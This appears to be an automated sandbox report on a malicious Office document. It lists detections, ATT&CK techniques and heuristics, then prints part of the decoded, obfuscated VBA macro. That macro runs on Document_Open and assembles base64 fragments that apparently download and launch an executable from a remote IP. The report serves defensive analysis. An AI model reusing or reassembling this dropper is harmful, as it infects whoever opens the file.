Verdict: MALICIOUS
Risk Score: 224

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros. The critical 'OLE_VBA_SHELL' heuristic indicates the use of the Shell() function, and the 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristic confirms this is triggered by the Document_Open auto-execution macro. This suggests the macro is designed to execute a command or script, likely to download and run a secondary payload. The ClamAV detection further confirms its malicious nature.
Heuristics (7)
- ClamAV: Doc.Macro.Obfuscation-6332451-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Macro.Obfuscation-6332451-0
- VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- Shell() call in VBA [critical] OLE_VBA_SHELL: Shell() call in VBA
- Document_Open macro [high] OLE_VBA_DOCOPEN: Document_Open macro
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 17942 bytes |

SHA-256: 4c9339ebd0b3f5a9b054e6aae43f64d2a8b9724c5781d38b696c8de9d63d809a

Detection (carved artifact):
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 2 long base64-like blob(s))
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
Dim zjC1PJd
zjC1PJd = Array("vUZEPc925", "obv0PGcu", "Ruyn1EWOV")
zmyTskrW = zjC1PJd(1)
hsAXlpOeV = "MVkJ5YjJObGMzTWdKSEJoZEdnN1luSmxZV3M3ZldOaGRHTm"
H8yNg = "9lM"
tFXuPiEO5 = "zE5"
Dim jTkOcbL
jTkOcbL = Array("SUv2LM5", "OvLxJbE", "Hk4ot")
xE9Hn = jTkOcbL(0)
Dim aNYcAg
aNYcAg = Array("C9qM5Ljpz", "uWNQGmgTh", "IixGM3")
kgHBS = aNYcAg(1)
Dim F91Ip8
F91Ip8 = Array("TSFkGZc")
xEsSv = F91Ip8(0)
Dim yH40B
yH40B = hsAXlpOeV & H8yNg & tFXuPiEO5
uGqnI = "WTIxa0lDOXJJSE"
I6TgoJfGZ = "5sZENCZlVFOVhSVkk5Y0c5M1pYSW1KaUJ6WlhRZ1gxTklSVXhNUFhOb1pXeHNKaVlnWTJGc2JDQWxYM"
FOCVx6JN = "UJQVjBWU0pTVmZVMGhGVEV3bElDUjNaV0pqYkdsbGJuUWdQU0J1WlhjdGIySnFaV04wSUZONWMzUmxiUzVPWlhRdVYyVmlRMnhwWlc1ME95UnRlWFZ5YkhNZ1BTQW5hSFIwY0Rvdkx6RTVNQzR4TkM0ek9DNDNOeTlyWlhsaWIyRnlaQ"
Gfn02T3cw = "zV5ZENjdVUzQnNhWFFvSnl3bktUc2tjR0YwYUNBOUlDUmxiblk2ZEdWdGNDQXJJQ2RjZm5SdGNDNWxlR1VuTzJadmNtVmhZMmdvSkcxNWRYSnNJR2x1SUNSdGVYVnliSE1wZTNSeWVYc2tkMlZpWTJ4cFpXNTBMa1J2ZDI1c2IyRmtSbWxzWlNna2JYbDFjbXd1Vkc5VGRISnBibWNvS1N3Z0pIQmhkR2dwTzFOMFlYSjB"
Dim OH8PCFL
OH8PCFL = Array("wSbWQaP", "C02w5vCU", "ijW6sMxnP")
BMfLrcb = OH8PCFL(2)
Dim JiEY6Fhmx
JiEY6Fhmx = uGqnI & I6TgoJfGZ & FOCVx6JN & Gfn02T3cw
Dim cM7eK0qR
cM7eK0qR = Array("kEbG0q", "MqwIEpMd")
e07Pqtdm = cM7eK0qR(1)
A2fKdOV = JiEY6Fhmx & yH40B
Dim JOCtUjaq
JOCtUjaq = Array("qi9hWJgE", "j2F58c")
mcm3YAIqZ = JOCtUjaq(0)
Dim egUe1dTX
egUe1dTX = Array("kQpcWSM")
rEanVSJ8 = egUe1dTX(0)
Dim mnA1pK5G
mnA1pK5G = Array("OYKe6pMrd", "dVe8pwNb")
pUn0IE1 = mnA1pK5G(1)
sex A2fKdOV
End Sub
Attribute VB_Name = "A9XQhfE4j"
Sub sex(EFmTL)
If Len("a5T9d") <> 252 Then
' DwrlvD
Else
' kBqRn5Cf
MsgBox "vj14GlWiX", 2, "t5Lgi"
End If
If Len("usBDZF1O") <> 252 Then
' m6fgE
Else
' II3U7
MsgBox "d1PNf", 2, "pgrs5"
End If
If Len("qyuXh") <> 138 Then
' ThWJDrwgY
Else
' NMBdo
MsgBox "kZOpE9o", 14, "znaVroMj4"
End If
Dim EwkYo
EwkYo = Array("G8leFXj", "S6ngSHJ")
S8UoND = EwkYo(1)
If Len("q5kOPsf4") <> 207 Then
' A1KLj4XT
Else
' DJ9i7qK
MsgBox "uDdr3", 46, "gFjJmw"
End If
Dim Nu0Y1h2
Nu0Y1h2 = Array("sqX1Le", "IUnoL")
Mw91iU = Nu0Y1h2(0)
If Len("QErS3I") <> 204 Then
' DUJ96XmwF
Else
' jKZk6JQ1
MsgBox "fZd1arF2", 63, "zi95G"
End If
If Len("W39Ac") <> 204 Then
' tPdkSG5lI
Else
' d5N2qd
MsgBox "EPVq5", 63, "hMSftBz"
End If
Dim knu8S
knu8S = Array("KO7Edn", "k8wXYV", "lXQiN")
UILf6GZ = knu8S(2)
Dim jkbuU
jkbuU = Array("zYFyXlJv", "becgPqt4")
ZpAD5 = jkbuU(0)
Dim P4AwW60
P4AwW60 = Array("uC87THo3", "pl0KM")
KXpd6vS7 = P4AwW60(1)
Dim C4T3asUw
C4T3asUw = Array("TY6WLZx")
uplD1Lk = C4T3asUw(0)
Dim G7SUY
G7SUY = Array("fQebMvs", "hBwyGUuoJ")
WihGNWuQ = G7SUY(0)
If Len("PjxR0hB") <> 231 Then
' Z9ErS
Else
' ZXBsth9f
MsgBox "OHJACc3R4", 8, "vIWAk6z7"
End If
If Len("wUVIFZ") <> 133 Then
' X6cJOKE1
Else
' tNuXbDEJP
MsgBox "dDSThefx", 23, "JVXW0"
End If
Dim sjkT8
sjkT8 = Array("yE5alcwt", "QmedRrO8", "hIsNEDUTp")
gLGiJ5Hc = sjkT8(1)
If Len("eKuTzQ8") <> 185 Then
' MbEZVQ
Else
' R963QN
MsgBox "FhQAx", 44, "KozmDG"
End If
If Len("OIVcu0O") <> 185 Then
' PMyY1n
Else
' x0GiszTgy
MsgBox "xWXytp", 44, "aUnT4Qx"
End If
Dim bNDaxRk8
bNDaxRk8 = Array("UHsjkayL", "xOEWyFR", "ex97JZPlL")
Xxmb8zPuY = bNDaxRk8(2)
Dim scSMo0Z
scSMo0Z = Array("ICMKraQ", "cWXPKI0Al")
SZoKuI = scSMo0Z(1)
Dim ISd2n
ISd2n = Array("fuXWwkyF3", "aNnys")
EpmS2 = ISd2n(1)
Dim byOloUujY
byOloUujY = Array("nbYZARun", "sKc2uM41", "c947OtN")
IdHaekgY = byOloUujY(1)
If Len("rLzdwsbS") <> 146 Then
' Qxq3RmVk1
Else
' jTdlE
MsgBox "rY3X8TRQ", 19, "bhd6iF1I"
End If
If Len("mwKWtn") <> 200 Then
' o1eExu
Else
' VmrBN6
MsgBox "StjfEdIyW", 29, "Aowr74"
End If
Dim UZgE7O
UZgE7O = Array("Ockvia0")
KvCfxN = UZgE7O(0)
Dim k8rVAS6Y
k8rVAS6Y = Array("b7uIk", "d3ugvOo", "
... (truncated)